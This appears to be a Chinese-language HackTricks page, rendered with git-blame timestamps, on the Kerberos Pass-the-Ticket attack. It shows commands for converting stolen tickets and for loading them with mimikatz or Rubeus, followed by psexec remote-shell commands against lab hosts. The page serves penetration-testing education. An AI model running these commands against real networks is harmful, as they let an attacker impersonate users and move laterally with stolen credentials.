2023-08-03 19:12:22 +00:00
|
|
|
|
# 传递票据
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
|
|
|
|
<details>
|
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks 云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 推特 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 YouTube 🎥</strong></a></summary>
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
* 你在一家**网络安全公司**工作吗?你想在 HackTricks 中看到你的**公司广告**吗?或者你想获得**PEASS 的最新版本或下载 HackTricks 的 PDF**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
|
|
|
|
* 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
|
|
|
|
|
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
|
|
|
|
|
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass),或者**关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
|
|
|
|
|
* **通过向**[**hacktricks 仓库**](https://github.com/carlospolop/hacktricks) **和**[**hacktricks-cloud 仓库**](https://github.com/carlospolop/hacktricks-cloud) **提交 PR 来分享你的黑客技巧。**
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
|
|
|
|
</details>
|
|
|
|
|
|
2023-01-01 16:19:07 +00:00
|
|
|
|
![](<../.gitbook/assets/image (9) (1) (2).png>)
|
2022-06-06 22:28:05 +00:00
|
|
|
|
|
2023-01-01 16:19:07 +00:00
|
|
|
|
\
|
2023-08-03 19:12:22 +00:00
|
|
|
|
使用 [**Trickest**](https://trickest.io/) 可以轻松构建和**自动化工作流程**,使用世界上**最先进的**社区工具。\
|
|
|
|
|
立即获取访问权限:
|
2022-06-06 22:28:05 +00:00
|
|
|
|
|
2023-01-01 16:19:07 +00:00
|
|
|
|
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
2022-06-06 22:28:05 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
## 传递票据(PTT)
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
这种攻击类似于传递密钥,但是不是使用哈希来请求票据,而是窃取票据本身并用于作为其所有者进行身份验证。
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
**阅读**:
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
* [从 Windows 中获取票据](../../network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md)
|
|
|
|
|
* [从 Linux 中获取票据](../../network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.md)
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
### 在平台之间交换 Linux 和 Windows 票据
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
使用 [ticket\_converter](https://github.com/Zer1t0/ticket\_converter) 脚本。唯一需要的参数是当前票据和输出文件,它会自动检测输入票据文件的格式并进行转换。例如:
|
2022-05-01 13:25:53 +00:00
|
|
|
|
```
|
2020-07-15 15:43:14 +00:00
|
|
|
|
root@kali:ticket_converter# python ticket_converter.py velociraptor.ccache velociraptor.kirbi
|
|
|
|
|
Converting ccache => kirbi
|
|
|
|
|
root@kali:ticket_converter# python ticket_converter.py velociraptor.kirbi velociraptor.ccache
|
|
|
|
|
Converting kirbi => ccache
|
|
|
|
|
```
|
2023-08-03 19:12:22 +00:00
|
|
|
|
[Kekeo](https://github.com/gentilkiwi/kekeo)是一个用于在Windows上执行Pass The Ticket攻击的工具。由于它在ASN1库中需要许可证,所以这个工具没有经过检查,但我认为值得一提。
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
### Pass The Ticket攻击
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
|
|
|
|
{% code title="Linux" %}
|
|
|
|
|
```bash
|
2023-08-03 19:12:22 +00:00
|
|
|
|
export KRB5CCNAME=/root/impacket-examples/krb5cc_1120601113_ZFxZpK
|
2020-07-15 15:43:14 +00:00
|
|
|
|
python psexec.py jurassic.park/trex@labwws02.jurassic.park -k -no-pass
|
|
|
|
|
```
|
|
|
|
|
{% code title="Windows" %}
|
|
|
|
|
```bash
|
|
|
|
|
#Load the ticket in memory using mimikatz or Rubeus
|
|
|
|
|
mimikatz.exe "kerberos::ptt [0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi"
|
|
|
|
|
.\Rubeus.exe ptt /ticket:[0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi
|
|
|
|
|
klist #List tickets in cache to cehck that mimikatz has loaded the ticket
|
|
|
|
|
.\PsExec.exe -accepteula \\lab-wdc01.jurassic.park cmd
|
|
|
|
|
```
|
|
|
|
|
{% endcode %}
|
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
## 参考资料
|
2022-10-05 21:51:12 +00:00
|
|
|
|
|
|
|
|
|
* [https://www.tarlogic.com/blog/how-to-attack-kerberos/](https://www.tarlogic.com/blog/how-to-attack-kerberos/)
|
|
|
|
|
|
2023-01-01 16:19:07 +00:00
|
|
|
|
![](<../.gitbook/assets/image (9) (1) (2).png>)
|
2022-06-06 22:28:05 +00:00
|
|
|
|
|
2023-01-01 16:19:07 +00:00
|
|
|
|
\
|
2023-08-03 19:12:22 +00:00
|
|
|
|
使用[**Trickest**](https://trickest.io/)可以轻松构建和自动化由全球**最先进**的社区工具提供支持的工作流程。\
|
|
|
|
|
立即获取访问权限:
|
2022-06-06 22:28:05 +00:00
|
|
|
|
|
2023-01-01 16:19:07 +00:00
|
|
|
|
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
2022-06-06 22:28:05 +00:00
|
|
|
|
|
2022-04-28 16:01:33 +00:00
|
|
|
|
<details>
|
|
|
|
|
|
2023-04-25 18:35:28 +00:00
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
* 你在**网络安全公司**工作吗?你想在HackTricks中看到你的**公司广告**吗?或者你想要访问**PEASS的最新版本或下载PDF格式的HackTricks**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
|
|
|
|
* 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
|
|
|
|
|
* 获取[**官方PEASS和HackTricks的衣物**](https://peass.creator-spring.com)
|
|
|
|
|
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass)或**关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
|
|
|
|
|
* **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和**[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享你的黑客技巧。**
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
|
|
|
|
</details>
|